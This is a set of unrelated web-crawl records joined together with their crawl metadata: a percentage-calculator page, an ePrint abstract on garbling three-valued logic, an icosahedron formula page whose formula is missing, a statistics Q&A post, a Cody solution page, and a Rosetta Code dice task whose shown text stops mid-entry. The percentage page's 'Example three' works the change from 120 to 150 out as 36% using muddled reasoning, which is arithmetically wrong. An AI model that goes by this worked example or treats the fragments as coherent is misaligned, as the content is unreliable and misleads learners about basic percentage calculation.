[ "# We use percentages in almost everything.\n\nPercentages are a very important part of our daily lives. They are used in Economics, Cooking, Health, Sports, Mathematics, Science, Jewellery, Geography, Medicine and many other areas.\n\n## Percent of Calculator\n\nCalculate percentage of X, quick & simple.\n\n%\n?\n\n64% of 9614 is:\n6152.96\n\n## Percent of - Table For 9614\n\nPercent of Difference\n1% of 9614 is 96.14 9517.86\n2% of 9614 is 192.28 9421.72\n3% of 9614 is 288.42 9325.58\n4% of 9614 is 384.56 9229.44\n5% of 9614 is 480.7 9133.3\n6% of 9614 is 576.84 9037.16\n7% of 9614 is 672.98 8941.02\n8% of 9614 is 769.12 8844.88\n9% of 9614 is 865.26 8748.74\n10% of 9614 is 961.4 8652.6\n11% of 9614 is 1057.54 8556.46\n12% of 9614 is 1153.68 8460.32\n13% of 9614 is 1249.82 8364.18\n14% of 9614 is 1345.96 8268.04\n15% of 9614 is 1442.1 8171.9\n16% of 9614 is 1538.24 8075.76\n17% of 9614 is 1634.38 7979.62\n18% of 9614 is 1730.52 7883.48\n19% of 9614 is 1826.66 7787.34\n20% of 9614 is 1922.8 7691.2\n21% of 9614 is 2018.94 7595.06\n22% of 9614 is 2115.08 7498.92\n23% of 9614 is 2211.22 7402.78\n24% of 9614 is 2307.36 7306.64\n25% of 9614 is 2403.5 7210.5\n26% of 9614 is 2499.64 7114.36\n27% of 9614 is 2595.78 7018.22\n28% of 9614 is 2691.92 6922.08\n29% of 9614 is 2788.06 6825.94\n30% of 9614 is 2884.2 6729.8\n31% of 9614 is 2980.34 6633.66\n32% of 9614 is 3076.48 6537.52\n33% of 9614 is 3172.62 6441.38\n34% of 9614 is 3268.76 6345.24\n35% of 9614 is 3364.9 6249.1\n36% of 9614 is 3461.04 6152.96\n37% of 9614 is 3557.18 6056.82\n38% of 9614 is 3653.32 5960.68\n39% of 9614 is 3749.46 5864.54\n40% of 9614 is 3845.6 5768.4\n41% of 9614 is 3941.74 5672.26\n42% of 9614 is 4037.88 5576.12\n43% of 9614 is 4134.02 5479.98\n44% of 9614 is 4230.16 5383.84\n45% of 9614 is 4326.3 5287.7\n46% of 9614 is 4422.44 5191.56\n47% of 9614 is 4518.58 5095.42\n48% of 9614 is 4614.72 4999.28\n49% of 9614 is 4710.86 4903.14\n50% of 9614 is 4807 4807\n51% of 9614 is 4903.14 4710.86\n52% of 9614 is 4999.28 4614.72\n53% of 9614 is 5095.42 4518.58\n54% of 9614 is 5191.56 4422.44\n55% of 9614 is 5287.7 4326.3\n56% of 9614 is 5383.84 4230.16\n57% of 9614 is 5479.98 4134.02\n58% of 9614 is 5576.12 4037.88\n59% of 9614 is 5672.26 3941.74\n60% of 9614 is 5768.4 3845.6\n61% of 9614 is 5864.54 3749.46\n62% of 9614 is 5960.68 3653.32\n63% of 9614 is 6056.82 3557.18\n64% of 9614 is 6152.96 3461.04\n65% of 9614 is 6249.1 3364.9\n66% of 9614 is 6345.24 3268.76\n67% of 9614 is 6441.38 3172.62\n68% of 9614 is 6537.52 3076.48\n69% of 9614 is 6633.66 2980.34\n70% of 9614 is 6729.8 2884.2\n71% of 9614 is 6825.94 2788.06\n72% of 9614 is 6922.08 2691.92\n73% of 9614 is 7018.22 2595.78\n74% of 9614 is 7114.36 2499.64\n75% of 9614 is 7210.5 2403.5\n76% of 9614 is 7306.64 2307.36\n77% of 9614 is 7402.78 2211.22\n78% of 9614 is 7498.92 2115.08\n79% of 9614 is 7595.06 2018.94\n80% of 9614 is 7691.2 1922.8\n81% of 9614 is 7787.34 1826.66\n82% of 9614 is 7883.48 1730.52\n83% of 9614 is 7979.62 1634.38\n84% of 9614 is 8075.76 1538.24\n85% of 9614 is 8171.9 1442.1\n86% of 9614 is 8268.04 1345.96\n87% of 9614 is 8364.18 1249.82\n88% of 9614 is 8460.32 1153.68\n89% of 9614 is 8556.46 1057.54\n90% of 9614 is 8652.6 961.4\n91% of 9614 is 8748.74 865.26\n92% of 9614 is 8844.88 769.12\n93% of 9614 is 8941.02 672.98\n94% of 9614 is 9037.16 576.84\n95% of 9614 is 9133.3 480.7\n96% of 9614 is 9229.44 384.56\n97% of 9614 is 9325.58 288.42\n98% of 9614 is 9421.72 192.28\n99% of 9614 is 9517.86 96.139999999999\n100% of 9614 is 9614 0\n\n### Here's How to Calculate 64% of 9614\n\nLet's take a quick example here:\n\nYou have a Target coupon of \\$9614 and you need to know how much will you save on your purchase if the discount is 64 percent.\n\nSolution:\n\nAmount Saved = Original Price x Discount in Percent / 100\n\nAmount Saved = (9614 x 64) / 100\n\nAmount Saved = 615296 / 100\n\nIn other words, a 64% discount for a purchase with an original price of \\$9614 equals \\$6152.96 (Amount Saved), so you'll end up paying 3461.04.\n\n### Calculating Percentages\n\nSimply click on the calculate button to get the results of percentage calculations. You will see the result on the next page. If there are errors in the input fields, the result page will be blank. The program allows you to calculate the difference between two numbers in percentages. You can also input a percentage of any number and get the numeric value. Although it is a simple calculator, it can be very useful in many scenarios. Our goal is to give you an easy to use percentage calculator that gives you results you want fast.\n\nPercentage in mathematics refers to fractions based in 100. It is usually represented by “%,” “pct,” or “percentage.” This web app allows a comma or dot as a decimal separator. So you can use both freely.\n\nWe have provided several examples for you to use. You can use the examples to feed in your own data correctly. We hope you will find this site useful for calculang percentages. You can even use it for crosschecking the accuracy of your assignment results.\n\nNB. Americans use “percent,” which the British prefer “per cent.”\n\n#### Examples\n\nExample one\n\nCalculate 20% of 200?\n20% of 200 =____\n(200/100) x 20 = _____\n2 x 20 = 40\n\nIt is quite easy. Just divide 200 by 100 to get one percent. The result is 2. Then multiply it by 20 ( 20% = 20 per hundred) = 20 x 2 = 40\n\nExample two\n\nWhat percentage of 125 is 50?\n\n50 = ---% of 125\n50 x (100/125) = 40%\n\nGet the value of one percent by dividing 100 by 125. After that, multiply the value by 50 to get the percentage value of 50 units, which is 40% That is how to calculate the percentage.\n\nExample three\n\nWhat is the percentage (%) change (increase or decrease) from 120 to 150?\n\n(150-120) x (100/120) = 36\n\nSince 150 represents 100%. One percent will be equal to 100/150. 150-120 is 30. Therefore, 30 units represents 30 x (100/150) = 36 % This is how to calculate the percentage increase.\n\nwe do not use a percentage at all times. There are scenarios where we simply want to show the ratio of numbers. For instance, what is 20% of 50? This can also be interpreted as 20 hundredths of 50. This equates to 20/100 x 50 = 10.\n\nYou can use a calculation trick here. Anyme you want to divide a number by 100, just move the decimal two places to the left. 20/100 x 50 calculated above can also be writen as (20 x 50)/100. Since 20x 50 =1000. You can simply divide 1000 by 100 by moving two decimal places to the left, which gives you 10.\n\nIn another scenario, you want to calculate the percentage increase or decrease. Supposing you have \\$10 and spend \\$2 to buy candy, then you have spent 20% of your money. So how much will be remaining? All the money you have is 100%, if you spend 20%, you will have 80% remaining. You can simply use the percentage reduction tool above to calculate this value.\n\n#### Origin\n\nThe word percent is derived from the Latin word percenter which means per hundred, and it is designated by %" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9141471,"math_prob":0.97192365,"size":7030,"snap":"2020-10-2020-16","text_gpt3_token_len":2732,"char_repetition_ratio":0.21947053,"word_repetition_ratio":0.039412674,"special_character_ratio":0.5638691,"punctuation_ratio":0.16309255,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998326,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-09T11:38:18Z\",\"WARC-Record-ID\":\"<urn:uuid:61eb564d-e69d-4e9c-845a-373c54b91ba3>\",\"Content-Length\":\"47727\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:11b71dd1-ebc7-4f17-abc0-c31aaa342bcf>\",\"WARC-Concurrent-To\":\"<urn:uuid:24555c38-2045-44ad-acce-b8741a90e1d5>\",\"WARC-IP-Address\":\"209.42.195.149\",\"WARC-Target-URI\":\"https://percent-of.com/calculate/what-is-64-of-9614/\",\"WARC-Payload-Digest\":\"sha1:6X5B73PZSZJ2NXBRVMC3YIDIZX322ILV\",\"WARC-Block-Digest\":\"sha1:LL3NUEXA4SXA476WYGJT6UW4V5JRQRU6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371833063.93_warc_CC-MAIN-20200409091317-20200409121817-00200.warc.gz\"}"}
https://eprint.iacr.org/2017/1225
[ "## Cryptology ePrint Archive: Report 2017/1225\n\nFast Garbling of Circuits over 3-Valued Logic\n\nYehuda Lindell and Avishay Yanai\n\nAbstract: In the setting of secure computation, a set of parties wish to compute a joint function of their private inputs without revealing anything but the output. Garbled circuits, first introduced by Yao, are a central tool in the construction of protocols for secure computation (and other tasks like secure outsourced computation), and are the fastest known method for constant-round protocols. In this paper, we initiate a study of garbling multivalent-logic circuits, which are circuits whose wires may carry values from some finite/infinite set of values (rather than only True and False). In particular, we focus on the three-valued logic system of Kleene, in which the admissible values are True, False, and Unknown. This logic system is used in practice in SQL where some of the values may be missing. Thus, efficient constant-round secure computation of SQL over a distributed database requires the ability to efficiently garble circuits over 3-valued logic. However, as we show, the two natural (naive) methods of garbling 3-valued logic are very expensive. In this paper, we present a general approach for garbling three-valued logic, which is based on first encoding the 3-value logic into Boolean logic, then using standard garbling techniques, and final decoding back into 3-value logic. Interestingly, we find that the specific encoding chosen can have a significant impact on efficiency. Accordingly, the aim is to find Boolean encodings of 3-value logic that enable efficient Boolean garbling (i.e., minimize the number of AND gates). We also show that Boolean AND gates can be garbled at the same cost of garbling XOR gates in the 3-value logic setting. Thus, it is unlikely that an analogue of free-XOR exists for 3-value logic garbling (since this would imply free-AND in the Boolean setting).\n\nCategory / Keywords: garbled-circuit, three-valued-logic\n\nDate: received 19 Dec 2017, last revised 21 Dec 2017\n\nContact author: ay yanay at gmail com\n\nAvailable format(s): PDF | BibTeX Citation\n\nNote: Added info to appendix.\n\nShort URL: ia.cr/2017/1225\n\n[ Cryptology ePrint archive ]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9088248,"math_prob":0.66718346,"size":2272,"snap":"2019-13-2019-22","text_gpt3_token_len":512,"char_repetition_ratio":0.119929455,"word_repetition_ratio":0.0,"special_character_ratio":0.21566902,"punctuation_ratio":0.11583924,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96175474,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-21T11:20:56Z\",\"WARC-Record-ID\":\"<urn:uuid:5af53c35-6b33-439d-a827-fb5c9f965822>\",\"Content-Length\":\"4255\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b744be26-a564-43d4-91e1-6e61fdedeef8>\",\"WARC-Concurrent-To\":\"<urn:uuid:e02a7709-b3ba-4c87-8ada-c06878971e66>\",\"WARC-IP-Address\":\"216.184.8.41\",\"WARC-Target-URI\":\"https://eprint.iacr.org/2017/1225\",\"WARC-Payload-Digest\":\"sha1:HT5RK6WWNA2GTTURQQYAUT2R6UNPL7SW\",\"WARC-Block-Digest\":\"sha1:HKDHEXRMD6UQQBWZIOOJ74XSFLHLRHVF\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232256314.52_warc_CC-MAIN-20190521102417-20190521124417-00195.warc.gz\"}"}
https://www.fxsolver.com/browse/formulas/Regular+Icosahedron+%28+midscribed+sphere+radius%29
[ "'\n\n# Regular Icosahedron ( midscribed sphere radius)\n\n## Description\n\nAn icosahedron is a polyhedron with 20 triangular faces, 30 edges and 12 vertices. A regular icosahedron has 20 identical equilateral faces, with five of the triangular faces meeting at each vertex. If the edge length of a regular icosahedron is “a”, the radius of a midscribed sphere ( which touches the middle of each edge, ) is related with the length of the edge of the triangle face and the “golden ratio”\n\nRelated formulas\n\n## Variables\n\n rm Radius of the midscribed sphere (m) a Length of the edge of the triangle face (m)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88045913,"math_prob":0.95693475,"size":585,"snap":"2023-40-2023-50","text_gpt3_token_len":152,"char_repetition_ratio":0.16695353,"word_repetition_ratio":0.06315789,"special_character_ratio":0.21880342,"punctuation_ratio":0.058252428,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98758847,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-24T14:03:10Z\",\"WARC-Record-ID\":\"<urn:uuid:e89514b8-7220-4655-b81c-69a0af678c40>\",\"Content-Length\":\"18957\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d93547c7-64ec-42e7-bbe2-4cde4cff7239>\",\"WARC-Concurrent-To\":\"<urn:uuid:d2d9ad7f-3bae-41b6-b272-fb1721b179fb>\",\"WARC-IP-Address\":\"178.254.54.75\",\"WARC-Target-URI\":\"https://www.fxsolver.com/browse/formulas/Regular+Icosahedron+%28+midscribed+sphere+radius%29\",\"WARC-Payload-Digest\":\"sha1:ZPVRMQAEYG5P4R5EQQZFMXH2JJFQEQIX\",\"WARC-Block-Digest\":\"sha1:5VTA3U6KZ7SQB3VT3EGY42DGRO4BPV42\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506646.94_warc_CC-MAIN-20230924123403-20230924153403-00403.warc.gz\"}"}
https://stats.stackexchange.com/questions/257047/comparing-two-gaussian-distributions
[ "# Comparing two gaussian distributions\n\nApologies if this is a really simple question; I'm sure if only I knew what to google I'd be able to find the answer myself, but it's been driving me mad.\n\nI have two datasets with approximately gaussian distributions. Both are measurements of the same background distribution, taken for reproducibility of some optical instrumentation I've developed. I need to prove this using the two measurements.\n\nMy understanding is that to achieve this, I integrate common area that's underneath both measured distributions. However...\n\nIn my case, gaussian 1 has a mean of 41.3 and a standard deviation of 1.0. Gaussian 2 has a mean of 41.7 and a standard deviation of 1.6. This means that the two gaussians intersect twice.\n\nWhen I integrate the common area, I get 0.76, which I interpret to mean there's a 0.76 probability that the two measurements are of the same background distribution. This sounds way too low to me.\n\nI had a look at KL divergence, but this is asymmetric and assumes that one of the measured distributions is the 'true' distribution - this is not the case for my measurements.\n\nI have some more similar comparisons with more than two measured distributions to worry about, but I'd like to walk before trying to run...\n\n• One can never actually measure an entire distribution--that's physically impossible. How, then, do you obtain these means and SDs? This is fundamentally important, for otherwise there is no disciplined correct way to answer your question. – whuber Jan 19 '17 at 0:36\n• I'm measuring size distributions of particles. A computer algorithm interrogates the scattered light from single particles and uses this to infer a size of that particle. Each of my distributions is composed of a large number (thousands) of such measurements. The two distributions are measuring the same particles; as such I am confident of the same background distribution. – dr_who_99 Jan 19 '17 at 8:57\n• Following @whuber's comments, it seems you use distribution in an un-statistical sense, which makes your question confusing. – Xi'an Jan 19 '17 at 10:09\n• @ Xi'an I've made an edit which hopefully clarifies the question. – dr_who_99 Jan 19 '17 at 13:20\n• It's unclear what you are asking. Your question seems to be \"I need to prove this,\" but what exactly does \"this\" refer to? That the optical measurements are reproducible? That the background particle size distributions are indeed the same? That they are indeed approximately Gaussian? (That, by the way, would be unusual for a particle size distribution: typically it's the cube roots of the sizes that tend to have Gaussian distributions.) And precisely what data--and how much of them--do you have to make your \"proof\"? – whuber Jan 19 '17 at 19:00\n\nI would suggest you use the symmetrized KL divergence: $$KL_{sym}(P, Q) = (KL(P||Q) + KL(Q||P)) / 2$$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9607456,"math_prob":0.77745163,"size":1343,"snap":"2019-43-2019-47","text_gpt3_token_len":297,"char_repetition_ratio":0.13592233,"word_repetition_ratio":0.008928572,"special_character_ratio":0.2271035,"punctuation_ratio":0.13011153,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9900326,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-17T02:50:14Z\",\"WARC-Record-ID\":\"<urn:uuid:0e88bc13-8e20-4bde-a54f-4ff1ed9f23e2>\",\"Content-Length\":\"147258\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:30e510d2-7ceb-4ecf-a762-33460d86f62a>\",\"WARC-Concurrent-To\":\"<urn:uuid:7c235160-b238-47cb-a668-6710ae6eab01>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/257047/comparing-two-gaussian-distributions\",\"WARC-Payload-Digest\":\"sha1:UHDRWKJMG3LY3FOV6JKXIVMMPOQ2FZJK\",\"WARC-Block-Digest\":\"sha1:QFV4PEOT2F445IJ2TB6J3B6WBJW7FRMG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668782.15_warc_CC-MAIN-20191117014405-20191117042405-00247.warc.gz\"}"}
https://ch.mathworks.com/matlabcentral/cody/problems/44969-chao-cac-b-n/solutions/1965776
[ "Cody\n\n# Problem 44969. Chào các bạn.\n\nSolution 1965776\n\nSubmitted on 7 Oct 2019 by Trung Luu Van\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nx = 1; y=2; z=3 y_correct = 6; assert(isequal(your_fcn_name(x,y,z),y_correct))\n\nz = 3 y = 6\n\n2   Pass\nx = 0; y=0; z=0; y_correct = 0; assert(isequal(your_fcn_name(x,y,z),y_correct))\n\ny = 0" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5794249,"math_prob":0.98741376,"size":505,"snap":"2020-34-2020-40","text_gpt3_token_len":171,"char_repetition_ratio":0.13572854,"word_repetition_ratio":0.0,"special_character_ratio":0.34851485,"punctuation_ratio":0.14285715,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9901664,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-29T15:12:20Z\",\"WARC-Record-ID\":\"<urn:uuid:7abcd83a-3c2e-4ff1-8d82-723273490de2>\",\"Content-Length\":\"75789\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c08cb5b1-37ad-4a0e-bbdb-f888fd5d2b33>\",\"WARC-Concurrent-To\":\"<urn:uuid:0a81f57c-9f35-49ef-b3c4-c5cc1c6e872d>\",\"WARC-IP-Address\":\"23.196.96.42\",\"WARC-Target-URI\":\"https://ch.mathworks.com/matlabcentral/cody/problems/44969-chao-cac-b-n/solutions/1965776\",\"WARC-Payload-Digest\":\"sha1:BB2ZS7JJCXRZU6XDZLJA555UOUUMWB3B\",\"WARC-Block-Digest\":\"sha1:ZD65OZUIF3PBPIFIFA565GEDP2FXM5BC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401643509.96_warc_CC-MAIN-20200929123413-20200929153413-00300.warc.gz\"}"}
https://rosettacode.org/wiki/Seven-dice_from_Five-dice
[ "I'm working on modernizing Rosetta Code's infrastructure. Starting with communications. Please accept this time-limited open invite to RC's Slack.. --Michael Mol (talk) 20:59, 30 May 2020 (UTC)\n\n# Seven-sided dice from five-sided dice\n\n(Redirected from Seven-dice from Five-dice)\nSeven-sided dice from five-sided dice\nYou are encouraged to solve this task according to the task description, using any language you may know.\n\n(Given an equal-probability generator of one of the integers 1 to 5 as `dice5`),   create `dice7` that generates a pseudo-random integer from 1 to 7 in equal probability using only `dice5` as a source of random numbers,   and check the distribution for at least one million calls using the function created in   Simple Random Distribution Checker.\n\nImplementation suggestion: `dice7` might call `dice5` twice, re-call if four of the 25 combinations are given, otherwise split the other 21 combinations into 7 groups of three, and return the group index from the rolls.\n\n## 11l\n\nTranslation of: Python\n`F dice5() R random:(1..5) F dice7() -> Int V r = dice5() + dice5() * 5 - 6 R I r < 21 {(r % 7) + 1} E dice7() F distcheck(func, repeats, delta) V bin = DefaultDict[Int, Int]() L 1..repeats bin[func()]++ V target = repeats I/ bin.len V deltacount = Int(delta / 100.0 * target) assert(all(bin.values().map(count -> abs(@target - count) < @deltacount)), ‘Bin distribution skewed from #. +/- #.: #.’.format(target, deltacount, sorted(bin.items()).map((key, count) -> (key, @target - count)))) print(bin) distcheck(dice5, 1000000, 1)distcheck(dice7, 1000000, 1)`\nOutput:\n```DefaultDict([1 = 199586, 2 = 200094, 3 = 198933, 4 = 200824, 5 = 200563])\nDefaultDict([1 = 142478, 2 = 142846, 3 = 143056, 4 = 142894, 5 = 143052, 6 = 143147, 7 = 142527])\n```\n\nThe specification of a package Random_57:\n\n`package Random_57 is  type Mod_7 is mod 7;  function Random7 return Mod_7; -- a \"fast\" implementation, minimazing the calls to the Random5 generator function Simple_Random7 return Mod_7; -- a simple implementation end Random_57;`\n\nImplementation of Random_57:\n\n` with Ada.Numerics.Discrete_Random; package body Random_57 is type M5 is mod 5;  package Rand_5 is new Ada.Numerics.Discrete_Random(M5); Gen: Rand_5.Generator; function Random7 return Mod_7 is N: Natural;  begin loop N := Integer(Rand_5.Random(Gen))* 5 + Integer(Rand_5.Random(Gen)); -- N is uniformly distributed in 0 .. 24 if N < 21 then return Mod_7(N/3); else -- (N-21) is in 0 .. 3 N := (N-21) * 5 + Integer(Rand_5.Random(Gen)); -- N is in 0 .. 19 if N < 14 then return Mod_7(N / 2); else -- (N-14) is in 0 .. 5 N := (N-14) * 5 + Integer(Rand_5.Random(Gen)); -- N is in 0 .. 29 if N < 28 then return Mod_7(N/4); else -- (N-28) is in 0 .. 1 N := (N-28) * 5 + Integer(Rand_5.Random(Gen)); -- 0 .. 9 if N < 7 then return Mod_7(N); else -- (N-7) is in 0, 1, 2 N := (N-7)* 5 + Integer(Rand_5.Random(Gen)); -- 0 .. 14 if N < 14 then return Mod_7(N/2); else -- (N-14) is 0. This is not useful for us! null; end if; end if; end if; end if; end if; end loop;  end Random7;  function Simple_Random7 return Mod_7 is N: Natural := Integer(Rand_5.Random(Gen))* 5 + Integer(Rand_5.Random(Gen)); -- N is uniformly distributed in 0 .. 24 begin while N > 20 loop N := Integer(Rand_5.Random(Gen))* 5 + Integer(Rand_5.Random(Gen)); end loop; -- Now I <= 20 return Mod_7(N / 3); end Simple_Random7; begin Rand_5.Reset(Gen);end Random_57;`\n\nA main program, using the Random_57 package:\n\n`with Ada.Text_IO, Random_57; procedure R57 is  use Random_57;  type Fun is access function return Mod_7;  function Rand return Mod_7 renames Random_57.Random7; -- change this to \"... renames Random_57.Simple_Random;\" if you like  procedure Test(Sample_Size: Positive; Rand: Fun; Precision: Float := 0.3) is  Counter: array(Mod_7) of Natural := (others => 0); Expected: Natural := Sample_Size/7; Small: Mod_7 := Mod_7'First; Large: Mod_7 := Mod_7'First;  Result: Mod_7; begin Ada.Text_IO.New_Line; Ada.Text_IO.Put_Line(\"Sample Size: \" & Integer'Image(Sample_Size)); Ada.Text_IO.Put( \" Bins:\"); for I in 1 .. Sample_Size loop Result := Rand.all; Counter(Result) := Counter(Result) + 1; end loop; for J in Mod_7 loop Ada.Text_IO.Put(Integer'Image(Counter(J))); if Counter(J) < Counter(Small) then Small := J; end if; if Counter(J) > Counter(Large) then Large := J; end if; end loop; Ada.Text_IO.New_Line; Ada.Text_IO.Put_Line(\" Small Bin:\" & Integer'Image(Counter(Small))); Ada.Text_IO.Put_Line(\" Large Bin: \" & Integer'Image(Counter(Large)));  if Float(Counter(Small)*7) * (1.0+Precision) < Float(Sample_Size) then Ada.Text_IO.Put_Line(\"Failed! Small too small!\"); elsif Float(Counter(Large)*7) * (1.0-Precision) > Float(Sample_Size) then Ada.Text_IO.Put_Line(\"Failed! Large too large!\"); else Ada.Text_IO.Put_Line(\"Passed\"); end if; end Test; begin Test( 10_000, Rand'Access, 0.08); Test( 100_000, Rand'Access, 0.04); Test( 1_000_000, Rand'Access, 0.02); Test(10_000_000, Rand'Access, 0.01);end R57;`\nOutput:\n```Sample Size: 10000\nBins: 1368 1404 1435 1491 1483 1440 1379\nSmall Bin: 1368\nLarge Bin: 1491\nPassed\n\nSample Size: 100000\nBins: 14385 14110 14362 14404 14362 14206 14171\nSmall Bin: 14110\nLarge Bin: 14404\nPassed\n\nSample Size: 1000000\nBins: 143765 142384 142958 142684 142799 142956 142454\nSmall Bin: 142384\nLarge Bin: 143765\nPassed\n\nSample Size: 10000000\nBins: 1429266 1428214 1428753 1427032 1428418 1428699 1429618\nSmall Bin: 1427032\nLarge Bin: 1429618\nPassed```\n\n## ALGOL 68\n\nTranslation of: C\n- note: This specimen retains the original C coding style.\nWorks with: ALGOL 68 version Revision 1 - no extensions to language used\nWorks with: ALGOL 68G version Any - tested with release 1.18.0-9h.tiny\nWorks with: ELLA ALGOL 68 version Any (with appropriate job cards) - tested with release 1.8-8d\n\nC's version using no multiplications, divisions, or mod operators:\n\n`PROC dice5 = INT: 1 + ENTIER (5*random); PROC mulby5 = (INT n)INT: ABS (BIN n SHL 2) + n; PROC dice7 = INT: ( INT d55 := 0; INT m := 1; WHILE m := ABS ((2r1 AND BIN m) SHL 2) + ABS (BIN m SHR 1); # repeats 4 - 2 - 1 # d55 := mulby5(mulby5(d55)) + mulby5(dice5) + dice5 - 6;# WHILE # d55 < m DO SKIP OD;  m := 1; WHILE d55>0 DO d55 +:= m; m := ABS (BIN d55 AND 2r111); # modulas by 8 # d55 := ABS (BIN d55 SHR 3) # divide by 8 # OD; m); PROC distcheck = (PROC INT dice, INT count, upb)VOID: ( [upb]INT sum; FOR i TO UPB sum DO sum[i] := 0 OD; FOR i TO count DO sum[dice]+:=1 OD; FOR i TO UPB sum WHILE print(whole(sum[i],0)); i /= UPB sum DO print(\", \") OD; print(new line)); main:( distcheck(dice5, 1000000, 5); distcheck(dice7, 1000000, 7))`\nOutput:\n```200598, 199852, 199939, 200602, 199009\n143529, 142688, 142816, 142747, 142958, 142802, 142460\n```\n\n## AutoHotkey\n\n`dice5(){ Random, v, 1, 5 Return, v} dice7(){ Loop { v := 5 * dice5() + dice5() - 6 IfLess v, 21, Return, (v // 3) + 1 }}`\n```Distribution check:\n\nTotal elements = 10000\n\nMargin = 3% --> Lbound = 1386, Ubound = 1471\n\nBucket 1 contains 1450 elements.\nBucket 2 contains 1374 elements. Skewed.\nBucket 3 contains 1412 elements.\nBucket 4 contains 1465 elements.\nBucket 5 contains 1370 elements. Skewed.\nBucket 6 contains 1485 elements. Skewed.\nBucket 7 contains 1444 elements.```\n\n## BBC BASIC\n\n` MAXRND = 7 FOR r% = 2 TO 5 check% = FNdistcheck(FNdice7, 10^r%, 0.1) PRINT \"Over \"; 10^r% \" runs dice7 \"; IF check% THEN PRINT \"failed distribution check with \"; check% \" bin(s) out of range\" ELSE PRINT \"passed distribution check\" ENDIF NEXT END  DEF FNdice7 LOCAL x% : x% = FNdice5 + 5*FNdice5 IF x%>26 THEN = FNdice7 ELSE = (x%+1) MOD 7 + 1  DEF FNdice5 = RND(5)  DEF FNdistcheck(RETURN func%, repet%, delta) LOCAL i%, m%, r%, s%, bins%() DIM bins%(MAXRND) FOR i% = 1 TO repet% r% = FN(^func%) bins%(r%) += 1 IF r%>m% m% = r% NEXT FOR i% = 1 TO m% IF bins%(i%)/(repet%/m%) > 1+delta s% += 1 IF bins%(i%)/(repet%/m%) < 1-delta s% += 1 NEXT = s%`\nOutput:\n```Over 100 runs dice7 failed distribution check with 4 bin(s) out of range\nOver 1000 runs dice7 failed distribution check with 2 bin(s) out of range\nOver 10000 runs dice7 passed distribution check\nOver 100000 runs dice7 passed distribution check\n```\n\n## C\n\n`int rand5(){\tint r, rand_max = RAND_MAX - (RAND_MAX % 5);\twhile ((r = rand()) >= rand_max);\treturn r / (rand_max / 5) + 1;} int rand5_7(){\tint r;\twhile ((r = rand5() * 5 + rand5()) >= 27);\treturn r / 3 - 1;} int main(){\tprintf(check(rand5, 5, 1000000, .05) ? \"flat\\n\" : \"not flat\\n\");\tprintf(check(rand7, 7, 1000000, .05) ? \"flat\\n\" : \"not flat\\n\");\treturn 0;}`\nOutput:\n```flat\nflat\n```\n\n## C#\n\nTranslation of: Java\n` using System; public class SevenSidedDice{ Random random = new Random();  static void Main(string[] args)\t\t{\t\t\tSevenSidedDice sevenDice = new SevenSidedDice();\t\t\tConsole.WriteLine(\"Random number from 1 to 7: \"+ sevenDice.seven()); Console.Read();\t\t} \t\tint seven()\t\t{\t\t\tint v=21;\t\t\twhile(v>20)\t\t\t\tv=five()+five()*5-6;\t\t\treturn 1+v%7;\t\t} \t\tint five()\t\t{ return 1 + random.Next(5);\t\t}}`\n\n## C++\n\nThis solution tries to minimize calls to the underlying d5 by reusing information from earlier calls.\n\n`template<typename F> class fivetoseven{public: fivetoseven(F f): d5(f), rem(0), max(1) {} int operator()();private: F d5; int rem, max;}; template<typename F> int fivetoseven<F>::operator()(){ while (rem/7 == max/7) { while (max < 7) { int rand5 = d5()-1; max *= 5; rem = 5*rem + rand5; }  int groups = max / 7; if (rem >= 7*groups) { rem -= 7*groups; max -= 7*groups; } }  int result = rem % 7; rem /= 7; max /= 7; return result+1;} int d5(){ return 5.0*std::rand()/(RAND_MAX + 1.0) + 1;} fivetoseven<int(*)()> d7(d5); int main(){ srand(time(0)); test_distribution(d5, 1000000, 0.001); test_distribution(d7, 1000000, 0.001);}`\n\n## 